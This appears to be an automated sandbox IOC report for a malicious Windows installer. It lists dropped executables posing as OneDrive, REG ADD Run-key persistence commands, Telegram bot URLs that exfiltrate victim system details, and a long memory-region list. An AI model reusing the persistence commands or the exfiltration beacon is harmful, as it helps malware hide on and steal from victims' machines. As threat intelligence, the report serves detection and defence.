IOC Report
68e7a0fa9f7dbbb34bc4bad97690ea72.exe

loading gif

Files

File Path
Type
Category
Malicious
68e7a0fa9f7dbbb34bc4bad97690ea72.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\[New]1.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\0ZkOYc2aecGHWT_s
Non-ISO extended-ASCII text, with NEL line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\sendMessage[1].htm
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\json[1].json
UTF-8 Unicode text
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe
"C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"
malicious
C:\Users\user\AppData\Roaming\[New]1.exe
C:\Users\user\AppData\Roaming\[New]1.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
malicious
C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://ipinfo.io/missingauth
unknown
http://nsis.sf.net/NSIS_Error
unknown
http://ocsp.entrust.net03
unknown
http://ipinfo.io/jsonxt
unknown
http://ocsp.entrust.net02
unknown
http://www.entrust.net/rpa03
unknown
https://api.telegram.org/
unknown
https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A
149.154.167.220
http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A
149.154.167.220
http://ip-api.com
unknown
http://aia.entrust.net/ts1-chain256.cer01
unknown
http://ipinfo.io/json
34.117.59.81
http://api.telegram.org/botTELEG
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://crl.entrust.net/ts1ca.crl0
unknown
http://ipinfo.io/json4
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.entrust.net/rpa0
unknown
https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20
unknown
http://ip-api.com4bkX
unknown
http://ipinfo.io/jsonHt
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ipinfo.io
34.117.59.81
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
208.95.112.1
ip-api.com
United States
34.117.59.81
ipinfo.io
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
OneDrive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
OneDrive
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AppLaunch_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
28A29E88000
heap
page read and write
F10000
trusted library allocation
page read and write
57C5A7B000
stack
page read and write
6890000
trusted library allocation
page read and write
6791000
heap
page read and write
25454846000
heap
page read and write
2C7F000
stack
page read and write
1130000
trusted library allocation
page read and write
6791000
heap
page read and write
68C0000
heap
page read and write
253D000
stack
page read and write
401000
unkown
page execute read
68A0000
trusted library allocation
page read and write
141F000
stack
page read and write
5F69B7D000
stack
page read and write
2545485F000
heap
page read and write
CFA000
heap
page read and write
6791000
heap
page read and write
28537622000
heap
page read and write
8E96000
trusted library allocation
page read and write
23B75090000
heap
page read and write
28A29E90000
heap
page read and write
C89ACFF000
stack
page read and write
57C5DFF000
stack
page read and write
6791000
heap
page read and write
58CC8FF000
stack
page read and write
28533480000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
FABB67E000
stack
page read and write
28A2A010000
trusted library allocation
page read and write
28532902000
heap
page read and write
1FCB4D70000
heap
page read and write
660000
trusted library allocation
page read and write
6791000
heap
page read and write
6890000
trusted library allocation
page read and write
2BA0000
heap
page read and write
8E95000
trusted library allocation
page read and write
1FCB4DBD000
heap
page read and write
21BE447E000
heap
page read and write
1FCB4D9C000
heap
page read and write
1FCB4D7B000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
EF3000
trusted library allocation
page execute and read and write
6791000
heap
page read and write
21BE447E000
heap
page read and write
6890000
trusted library allocation
page read and write
1FCB4DAD000
heap
page read and write
6791000
heap
page read and write
1FCB44DF000
heap
page read and write
68A0000
trusted library allocation
page read and write
93408FE000
stack
page read and write
6791000
heap
page read and write
9DE000
stack
page read and write
1FCB4D9C000
heap
page read and write
3DA000
stack
page read and write
43C000
unkown
page readonly
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D51000
heap
page read and write
28532107000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
20BF3000000
heap
page read and write
1FCB5200000
heap
page read and write
6791000
heap
page read and write
1FCB4450000
heap
page read and write
6A94000
trusted library allocation
page read and write
6840000
heap
page execute and read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
1FCB4D6B000
heap
page read and write
6DAFFFD000
stack
page read and write
E5B000
heap
page read and write
285375F0000
trusted library allocation
page read and write
207BA9E4000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8FA0000
trusted library allocation
page read and write
6791000
heap
page read and write
9970000
trusted library allocation
page read and write
292D000
stack
page read and write
8EA0000
trusted library allocation
page read and write
26B2B4C0000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
265F000
stack
page read and write
1FCB4D9C000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
28537900000
trusted library allocation
page read and write
6A79000
trusted library allocation
page read and write
1FCB445B000
heap
page read and write
2D70000
heap
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6DA000
heap
page read and write
6791000
heap
page read and write
1FCB4D86000
heap
page read and write
1FCB44CB000
heap
page read and write
1FCB4DAD000
heap
page read and write
1FCB4D67000
heap
page read and write
28537950000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
25A0000
remote allocation
page read and write
1FCB4D9C000
heap
page read and write
68A6000
trusted library allocation
page read and write
25454839000
heap
page read and write
28533461000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5F6A27F000
stack
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
E4D000
heap
page read and write
6791000
heap
page read and write
26B2B628000
heap
page read and write
CAE937B000
stack
page read and write
158FCC13000
heap
page read and write
8E45000
trusted library allocation
page read and write
1FCB5203000
heap
page read and write
718F000
stack
page read and write
C89ABFC000
stack
page read and write
F16000
trusted library allocation
page execute and read and write
8E90000
trusted library allocation
page read and write
17BFE629000
heap
page read and write
68A0000
trusted library allocation
page read and write
1FCB4D6B000
heap
page read and write
285320FE000
heap
page read and write
6791000
heap
page read and write
E65000
heap
page read and write
C34000
heap
page read and write
23B7508C000
heap
page read and write
20BF30D0000
heap
page read and write
8E90000
trusted library allocation
page read and write
2FC000
stack
page read and write
408000
unkown
page readonly
28C0000
heap
page read and write
68A0000
trusted library allocation
page read and write
25454869000
heap
page read and write
28A29D80000
heap
page read and write
640000
trusted library allocation
page read and write
28537550000
trusted library allocation
page read and write
285375F0000
trusted library allocation
page read and write
5F69C7D000
stack
page read and write
C34000
heap
page read and write
25454841000
heap
page read and write
6791000
heap
page read and write
C0A077E000
stack
page read and write
28531FC0000
heap
page read and write
C34000
heap
page read and write
927000
unkown
page execute read
C34000
heap
page read and write
FABB5F9000
stack
page read and write
207BA860000
heap
page read and write
8E44000
trusted library allocation
page read and write
21BE443C000
heap
page read and write
9950000
trusted library allocation
page read and write
28537940000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D74000
heap
page read and write
1FCB5202000
heap
page read and write
6791000
heap
page read and write
21BE447E000
heap
page read and write
68A5000
trusted library allocation
page read and write
20BF308A000
heap
page read and write
8E90000
trusted library allocation
page read and write
6A24000
trusted library allocation
page read and write
CAE947E000
stack
page read and write
6791000
heap
page read and write
E30000
heap
page read and write
68A0000
trusted library allocation
page read and write
158FCC78000
heap
page read and write
285376E2000
heap
page read and write
6791000
heap
page read and write
28537704000
heap
page read and write
1FCB4D9C000
heap
page read and write
21BE4360000
heap
page read and write
68A0000
trusted library allocation
page read and write
8E96000
trusted library allocation
page read and write
6791000
heap
page read and write
69FE000
stack
page read and write
C30000
heap
page read and write
23B75802000
trusted library allocation
page read and write
E30000
heap
page read and write
CAE967B000
stack
page read and write
1FCB4DAD000
heap
page read and write
990F000
trusted library allocation
page read and write
1FCB4D66000
heap
page read and write
9340B7E000
unkown
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
158FCD02000
heap
page read and write
1A3757A0000
trusted library allocation
page read and write
28A29DD9000
heap
page read and write
6791000
heap
page read and write
1FCB5202000
heap
page read and write
4C0000
trusted library allocation
page read and write
6791000
heap
page read and write
5F6A17F000
stack
page read and write
40A000
unkown
page write copy
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
9C000
stack
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
630000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
58CBE7B000
stack
page read and write
254547B0000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
9550000
trusted library allocation
page read and write
8E97000
trusted library allocation
page read and write
6D0000
heap
page read and write
8EA0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
17BFE600000
heap
page read and write
C89A9F7000
stack
page read and write
68B0000
trusted library allocation
page read and write
8FBD000
trusted library allocation
page read and write
6791000
heap
page read and write
17BFE613000
heap
page read and write
28537702000
heap
page read and write
1FCB4513000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4426000
heap
page read and write
1A3757D0000
remote allocation
page read and write
8E90000
trusted library allocation
page read and write
1FCB4DAD000
heap
page read and write
17BFE550000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
26B2B702000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
28537A90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
500000
heap
page read and write
9AF000
unkown
page readonly
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
2545487E000
heap
page read and write
2AB0000
direct allocation
page execute and read and write
28537980000
remote allocation
page read and write
6791000
heap
page read and write
1FCB4508000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
438000
unkown
page readonly
FDA000
heap
page read and write
92CE000
stack
page read and write
2990000
remote allocation
page read and write
472000
unkown
page readonly
1FCB4D10000
heap
page read and write
68A0000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
BCD000
unkown
page readonly
9560000
trusted library allocation
page read and write
23B75052000
heap
page read and write
1FCB4D96000
heap
page read and write
C34000
heap
page read and write
23B74F90000
heap
page read and write
23B75000000
heap
page read and write
2545486D000
heap
page read and write
6791000
heap
page read and write
26B2B679000
heap
page read and write
1FCB4D6E000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
9AC2000
trusted library allocation
page read and write
26B2B4D0000
heap
page read and write
1FCB444D000
heap
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
1FCB4D13000
heap
page read and write
207BA9D1000
heap
page read and write
8E90000
trusted library allocation
page read and write
2BB0000
heap
page read and write
11B0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
258E000
direct allocation
page execute and read and write
B45000
heap
page read and write
EF4000
trusted library allocation
page read and write
8AFE000
stack
page read and write
8E95000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
158FCB00000
heap
page read and write
207BAA03000
heap
page read and write
8E9F000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
23B75113000
heap
page read and write
6791000
heap
page read and write
28537520000
trusted library allocation
page read and write
2545484D000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
28537908000
trusted library allocation
page read and write
17BFE580000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
C89A33C000
stack
page read and write
BD0000
heap
page read and write
1A375829000
heap
page read and write
A00000
heap
page read and write
6791000
heap
page read and write
321000
unkown
page execute read
158FCC5A000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
23B75082000
heap
page read and write
8FA0000
trusted library allocation
page read and write
1FCB4D6B000
heap
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
68C0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
C3B000
stack
page read and write
8EA0000
trusted library allocation
page read and write
1FCB5202000
heap
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
20BF2F30000
heap
page read and write
6791000
heap
page read and write
68E4000
heap
page read and write
6791000
heap
page read and write
25454844000
heap
page read and write
6791000
heap
page read and write
21BE4488000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
17BFEE02000
trusted library allocation
page read and write
6C73000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
4FC9F7C000
stack
page read and write
8E90000
trusted library allocation
page read and write
6F0E000
stack
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
21BE4474000
heap
page read and write
93407F7000
stack
page read and write
2853207A000
heap
page read and write
8E9B000
trusted library allocation
page read and write
6BD0000
trusted library allocation
page read and write
5F695BB000
stack
page read and write
8E90000
trusted library allocation
page read and write
BCD000
unkown
page readonly
4FC9CFE000
stack
page read and write
6791000
heap
page read and write
158FCD08000
heap
page read and write
9990000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
8E90000
trusted library allocation
page read and write
285376E8000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
934014B000
stack
page read and write
F0D000
trusted library allocation
page execute and read and write
29D0000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
28532013000
heap
page read and write
1FCB4D86000
heap
page read and write
68D754E000
stack
page read and write
6791000
heap
page read and write
DCF000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
28532802000
heap
page read and write
21BE4400000
heap
page read and write
6791000
heap
page read and write
1FCB4DCE000
heap
page read and write
6791000
heap
page read and write
3FF000
stack
page execute and read and write
6791000
heap
page read and write
670000
heap
page read and write
25454847000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
E14000
heap
page read and write
68A0000
trusted library allocation
page read and write
28A29EAB000
heap
page read and write
21BE4500000
heap
page read and write
28532900000
heap
page read and write
6791000
heap
page read and write
FCE000
stack
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
254546B0000
heap
page read and write
1FCB44E8000
heap
page read and write
C34000
heap
page read and write
8F9D000
stack
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
68D74CB000
stack
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
290000
heap
page read and write
8E90000
trusted library allocation
page read and write
28537921000
trusted library allocation
page read and write
6791000
heap
page read and write
755A000
stack
page read and write
6E00000
heap
page read and write
6791000
heap
page read and write
98E000
stack
page read and write
285376FF000
heap
page read and write
68A0000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
1FCB4D6A000
heap
page read and write
58CC07C000
stack
page read and write
320000
unkown
page readonly
EA5000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
17BFE677000
heap
page read and write
1FCB4DAD000
heap
page read and write
17BFE702000
heap
page read and write
6791000
heap
page read and write
925000
unkown
page read and write
6BD1000
trusted library allocation
page read and write
28A29D10000
heap
page read and write
6791000
heap
page read and write
472000
unkown
page readonly
C34000
heap
page read and write
6791000
heap
page read and write
1A37585C000
heap
page read and write
8E90000
trusted library allocation
page read and write
28A29E20000
trusted library allocation
page read and write
28537A70000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
2545482D000
heap
page read and write
1FCB4D6F000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E96000
trusted library allocation
page read and write
E6C000
heap
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
20BF3113000
heap
page read and write
1FCB4D97000
heap
page read and write
E4E000
heap
page read and write
21BE43F0000
trusted library allocation
page read and write
C34000
heap
page read and write
68B5000
trusted library allocation
page read and write
6791000
heap
page read and write
B6E000
stack
page read and write
6791000
heap
page read and write
1FCB4D00000
heap
page read and write
6791000
heap
page read and write
1FCB4DC3000
heap
page read and write
1FCB4D85000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
400000
remote allocation
page readonly
DD0000
heap
page read and write
1FCB4DAD000
heap
page read and write
1FCB4D89000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D86000
heap
page read and write
6791000
heap
page read and write
905000
unkown
page readonly
8E90000
trusted library allocation
page read and write
9AF000
unkown
page readonly
1FCB4BE0000
remote allocation
page read and write
2545487B000
heap
page read and write
6791000
heap
page read and write
57C587E000
stack
page read and write
1FCB4D83000
heap
page read and write
1FCB4D6F000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9C000
heap
page read and write
131E000
stack
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
C34000
heap
page read and write
21BE4513000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8F5E000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
21BE4452000
heap
page read and write
28537662000
heap
page read and write
2545484B000
heap
page read and write
17BFE63F000
heap
page read and write
1FCB4360000
heap
page read and write
6791000
heap
page read and write
25454640000
heap
page read and write
9960000
trusted library allocation
page read and write
28537924000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
1FCB4D88000
heap
page read and write
6791000
heap
page read and write
68C0000
trusted library allocation
page read and write
DA0000
trusted library allocation
page read and write
6791000
heap
page read and write
2CA0000
heap
page read and write
6791000
heap
page read and write
9F1000
unkown
page execute read
2853763D000
heap
page read and write
9925000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4D64000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
23B75058000
heap
page read and write
C0A013B000
stack
page read and write
6791000
heap
page read and write
28A29DA0000
heap
page read and write
58CC37E000
stack
page read and write
6791000
heap
page read and write
320000
unkown
page readonly
1FCB5202000
heap
page read and write
2570000
direct allocation
page execute and read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB444F000
heap
page read and write
C34000
heap
page read and write
8E90000
trusted library allocation
page read and write
158FCC52000
heap
page read and write
C0A067B000
stack
page read and write
96BD000
stack
page read and write
6791000
heap
page read and write
E15000
heap
page read and write
6791000
heap
page read and write
B42000
unkown
page execute read
9F1000
unkown
page execute read
6791000
heap
page read and write
285376E2000
heap
page read and write
67A0000
heap
page read and write
58CC2FE000
stack
page read and write
6791000
heap
page read and write
28537530000
trusted library allocation
page read and write
6A86000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
26B2B600000
heap
page read and write
8E95000
trusted library allocation
page read and write
6E038FE000
stack
page read and write
158FCC5E000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D65000
heap
page read and write
1FCB4D66000
heap
page read and write
1FCB4D63000
heap
page read and write
6791000
heap
page read and write
2545486F000
heap
page read and write
6791000
heap
page read and write
1FCB448B000
heap
page read and write
925000
unkown
page write copy
257C000
stack
page read and write
1FCB44B8000
heap
page read and write
68C0000
trusted library allocation
page read and write
E15000
heap
page read and write
B20000
unkown
page readonly
E4D000
heap
page read and write
6791000
heap
page read and write
1FCB444C000
heap
page read and write
6F4E000
stack
page read and write
20BF30EA000
heap
page read and write
1FCB4D65000
heap
page read and write
28537564000
trusted library allocation
page read and write
F20000
heap
page read and write
5F699FB000
stack
page read and write
C89A67E000
stack
page read and write
CAE957A000
stack
page read and write
68D7CFF000
stack
page read and write
28A29E30000
trusted library allocation
page read and write
6DAFEFE000
stack
page read and write
8E90000
trusted library allocation
page read and write
2853790E000
trusted library allocation
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
E68000
heap
page read and write
6791000
heap
page read and write
20BF2F40000
heap
page read and write
9914000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
8E97000
trusted library allocation
page read and write
F12000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
DF2000
heap
page read and write
290E000
stack
page read and write
25454866000
heap
page read and write
D3F000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
28A29EA8000
heap
page read and write
1FCB4D83000
heap
page read and write
98FE000
stack
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9C000
heap
page read and write
2C3E000
stack
page read and write
C34000
heap
page read and write
28A29D20000
trusted library allocation
page read and write
6791000
heap
page read and write
17BFE602000
heap
page read and write
28532958000
heap
page read and write
68A0000
trusted library allocation
page read and write
23B7504D000
heap
page read and write
6791000
heap
page read and write
1FCB4D6E000
heap
page read and write
68A0000
trusted library allocation
page read and write
20BF30BF000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
207BA9E6000
heap
page read and write
7C9000
stack
page read and write
28537600000
heap
page read and write
20BF3081000
heap
page read and write
8E90000
trusted library allocation
page read and write
28537656000
heap
page read and write
285376AF000
heap
page read and write
1FCB4D86000
heap
page read and write
6791000
heap
page read and write
1FCB4D61000
heap
page read and write
1FCB4DC7000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9F000
heap
page read and write
1FCB4D86000
heap
page read and write
660000
heap
page read and write
207BA9F0000
heap
page read and write
26B2B640000
heap
page read and write
68A0000
trusted library allocation
page read and write
1FCB5202000
heap
page read and write
8FB0000
trusted library allocation
page read and write
1FCB4D9D000
heap
page read and write
8E97000
trusted library allocation
page read and write
68A5000
trusted library allocation
page read and write
25455002000
trusted library allocation
page read and write
28537960000
trusted library allocation
page read and write
991D000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
675000
heap
page read and write
6DAF73B000
stack
page read and write
4FC9C7A000
stack
page read and write
8E90000
trusted library allocation
page read and write
1137000
trusted library allocation
page execute and read and write
6791000
heap
page read and write
934057B000
stack
page read and write
97FE000
stack
page read and write
28A2ACE0000
trusted library allocation
page read and write
113B000
trusted library allocation
page execute and read and write
21BE4413000
heap
page read and write
8FB0000
trusted library allocation
page read and write
23B74F30000
heap
page read and write
68A0000
trusted library allocation
page read and write
1FCB4D6B000
heap
page read and write
6791000
heap
page read and write
9904000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
1A375640000
heap
page read and write
1FCB4D7B000
heap
page read and write
158FCC84000
heap
page read and write
8E90000
trusted library allocation
page read and write
6C73000
trusted library allocation
page read and write
FABB6FF000
stack
page read and write
E30000
heap
page read and write
6DB017E000
stack
page read and write
21BE4402000
heap
page read and write
8E90000
trusted library allocation
page read and write
C34000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB44C4000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4429000
heap
page read and write
6791000
heap
page read and write
97BF000
stack
page read and write
8E96000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
6790000
heap
page read and write
4FC9E79000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4D63000
heap
page read and write
1FCB4D6D000
heap
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
